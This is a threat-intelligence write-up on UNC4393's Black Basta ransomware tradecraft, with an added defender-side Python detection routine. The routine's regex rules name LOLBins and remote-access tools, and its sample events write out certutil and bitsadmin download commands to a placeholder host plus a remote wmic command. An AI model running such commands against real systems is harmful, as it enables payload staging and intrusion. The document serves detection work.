2024-08-08

UNC4393 Fuels Black Basta's Ransomware Operations

Level: Tactical | Source: Mandiant | Global

The threat group UNC4393, reported by Mandiant, poses a serious risk due to its proficiency and speed in executing ransomware attacks. Known primarily for deploying BASTA ransomware and relying on Qakbot malware for initial access, the group adapted after Qakbot's infrastructure was disrupted by law enforcement in August 2023. They shifted to Darkgate malware and formed partnerships with other threat clusters, such as UNC2633, UNC2500, and UNC5155, benefiting from initial access brokers (IAB). Mandiant emphasizes the severity of this group, having "responded to over 40 separate UNC4393 intrusions across 20 different industry verticals," demonstrating their extensive reach. The group's operations are distinguished by their rapid execution, "with a median time to ransom of approximately 42 hours."

UNC4393 leverages various malware tools to conduct its attacks. These include BASTA ransomware, SYSTEMBC, KNOTWRAP, KNOTROCK, DAWNCRY, PORTYARD, and COGSCAN. The BASTA ransomware, written in C++, can delete volume shadow copies and uses ChaCha20 or XChaCha20 encryption. SYSTEMBC acts as a tunneler and can retrieve additional payloads, while KNOTWRAP and DAWNCRY serve as memory-only droppers for additional payloads. PORTYARD is used for tunneling, and COGSCAN is employed for network reconnaissance.

UNC4393's methods are characterized by a blend of living-off-the-land techniques and custom malware deployment. Mandiant's observation of UNC4393's intrusion lifecycle typically starts with initial access gained through phishing emails distributing QAKBOT malware. Once inside the network, the group is adept at using living-off-the-land binaries (LOLBins) to maintain stealth and persistence within the compromised network. These tools include BITSADMIN for background file transfers, curl for data retrieval, cmd and PowerShell for command execution, certutil for downloading payloads, and WMI for remote command execution. The use of "certutil.exe -urlcache" is common for downloading payloads. The group conducts internal reconnaissance using tools like BLOODHOUND, ADFIND, and PSNMAP. They rely heavily on SMB, RDP, remote WMI commands, and various remote access software like AnyDesk, Atera, ScreenConnect, Splashtop, and NetSupport for lateral movement and persistence. Other techniques used to fortify persistence include creating scheduled tasks, manipulating user accounts with password resets or modifying group permissions, modifying the registry, and installing new services. Monitoring files dropped in directories C:\ProgramData, C:\Windows, and C:\Users\Public can be crucial for identifying potential malicious activity.
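As an added, defender-side example that is not part of the Anvilogic or Mandiant write-up: a small Python triage routine that applies the LOLBin, remote-access-tool and staging-directory indicators named above to constructed process-creation events (hosts, users and URLs are placeholders, not real indicators).

```python
import re
from dataclasses import dataclass

# Staging directories the report singles out; a download LOLBin writing here is worth a look.
STAGING_DIRS = ("c:\\programdata\\", "c:\\windows\\", "c:\\users\\public\\")

# Detection rules keyed on the LOLBins and remote-access tools named in the report.
RULES = [
    ("certutil-urlcache-download", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache")),
    ("bitsadmin-transfer", re.compile(r"\bbitsadmin(\.exe)?\b.*/(transfer|addfile)\b")),
    ("wmic-remote-process", re.compile(r"\bwmic(\.exe)?\b.*/node:.*\bprocess\b.*\bcall\b.*\bcreate\b")),
    ("remote-access-tool", re.compile(r"\b(anydesk|atera|screenconnect|splashtop|netsupport)\b")),
]
DOWNLOADERS = {"certutil-urlcache-download", "bitsadmin-transfer"}

@dataclass
class ProcEvent:
    host: str
    user: str
    cmdline: str

def _args(cmdline):
    """Drop the leading image token (quoted or bare) so the image's own path is not matched."""
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)', cmdline, re.S)
    return m.group(1) if m else cmdline

def triage(ev):
    """Return the rule names this event trips (empty list = nothing of note)."""
    cl = ev.cmdline.lower()
    hits = [name for name, pat in RULES if pat.search(cl)]
    # Only a downloader writing into a staging directory gets the extra flag,
    # so the C:\Windows\System32\... image path of a benign process does not fire it.
    if DOWNLOADERS & set(hits) and any(d in _args(cl) for d in STAGING_DIRS):
        hits.append("writes-staging-dir")
    return hits

# Constructed sample events (hosts, users and URLs are placeholders, not real indicators).
SAMPLE_EVENTS = [
    ProcEvent("ws01", "CORP\\jdoe", "certutil.exe -urlcache -split -f http://staging.invalid/a.dat C:\\ProgramData\\a.dat"),
    ProcEvent("ws01", "CORP\\jdoe", "bitsadmin.exe /transfer job1 /download /priority high http://staging.invalid/b.bin C:\\Users\\Public\\b.bin"),
    ProcEvent("ws01", "CORP\\jdoe", 'wmic /node:SRV02 process call create "cmd.exe /c hostname"'),
    ProcEvent("ws02", "CORP\\svc", '"C:\\Windows\\System32\\certutil.exe" -hashfile C:\\Windows\\Temp\\x.msi SHA256'),
    ProcEvent("ws03", "CORP\\asmith", '"C:\\Program Files\\AnyDesk\\AnyDesk.exe" --service'),
]

def triage_all(events=SAMPLE_EVENTS):
    """Map each event's command line to its hits; non-empty entries would go to the SOC queue."""
    return {ev.cmdline: triage(ev) for ev in events}

if __name__ == "__main__":
    for cmd, hits in triage_all().items():
        print(("ALERT " if hits else "ok    ") + ",".join(hits) + " :: " + cmd)
```

The fourth sample shows why the image path is stripped before the staging-directory check: a benign certutil hash run living under C:\Windows\System32 produces no hit.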

Efforts to evade defenses include process injection, disabling the Windows firewall, and impairing security monitoring tools. Techniques to acquire credentials include Kerberoasting, pass-the-hash, impersonating access tokens, dumping LSASS, and gathering credentials from the registry. UNC4393's ultimate goal is data theft and extortion, leveraging the threat of data leakage to pressure victims into paying ransoms. They frequently use RCLONE to exfiltrate data, often disguising the binaries as legitimate system utilities. Their ransomware deployment has evolved from manual invocation to utilizing the KNOTROCK utility, which creates symbolic links on network shares and executes the ransomware. This evolution demonstrates UNC4393's commitment to refining its tactics to maximize efficiency and impact.

Mandiant's attribution of the Black Basta ransomware operations has narrowed to "two primary clusters: UNC4393 and UNC3973," with UNC4393 accounting for the "majority of BASTA-related activity." Given the group's ties to the Black Basta ransomware operation, some notable details are shared about how the ransomware group separates itself from other ransomware-as-a-service (RaaS) operations. The group does not openly recruit affiliates. Instead, Mandiant found that "BASTA operators maintain a private or small, closed-invitation affiliate model," and "they focus on acquiring initial access via partnerships or purchases in underground communities." While the ransomware operation has held a strong record of over 500 entities compromised since its emergence in 2022, their data leak site (DLS) activity in 2024 peaked at over 35 victims in March 2024 and declined to its lowest in July 2024, with over five victims observed.
